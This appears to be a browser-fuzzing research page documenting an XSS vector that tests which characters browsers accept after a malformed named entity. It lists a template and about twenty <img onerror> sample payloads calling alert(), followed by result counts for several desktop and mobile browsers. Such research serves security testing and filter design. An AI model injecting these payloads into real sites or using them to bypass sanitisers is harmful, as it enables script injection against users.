Characters allowed after malformed entities
This vector shows what characters are allowed after a malformed names entity.
Created by: hackvertor
Created on: Monday, July 1, 2024 at 9:26:08 PM
Updated on: Tuesday, May 27, 2025 at 8:16:09 AM
Detecting browser...
Category: Entity Parsing
Vector visibility: Public
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="1&$[chr]log($[i])">Sample payloads
<img src=data: onerror="1& alert(8199)"><img src=data: onerror="1&+alert(43)"><img src=data: onerror="1& alert(8193)"><img src=data: onerror="1&0x0Balert(11)"><img src=data: onerror="1& alert(8198)"><img src=data: onerror="1& alert(12288)"><img src=data: onerror="1&alert(65279)"><img src=data: onerror="1& alert(8200)"><img src=data: onerror="1& alert(8239)"><img src=data: onerror="1& alert(8196)"><img src=data: onerror="1&!alert(33)"><img src=data: onerror="1& alert(8194)"><img src=data: onerror="1&0x0Calert(12)"><img src=data: onerror="1& alert(5760)"><img src=data: onerror="1&alert(59)"><img src=data: onerror="1&-alert(45)"><img src=data: onerror="1&0x0Dalert(13)"><img src=data: onerror="1&
alert(8232)"><img src=data: onerror="1&
alert(8233)"><img src=data: onerror="1& alert(8195)">Fuzz results
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated
Sun Jan 25 2026
Found 31 results
Loading...
Chrome 126.0.0.0 desktop macOS 10.15.7older version
Updated
Tue Jul 02 2024
Found 31 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Tue Jul 02 2024
Found 31 results
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 31 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 31 results
Loading...
Safari 17.5 mobile iOS 17.5.1older version
Updated
Mon Jul 01 2024
Found 31 results
Loading...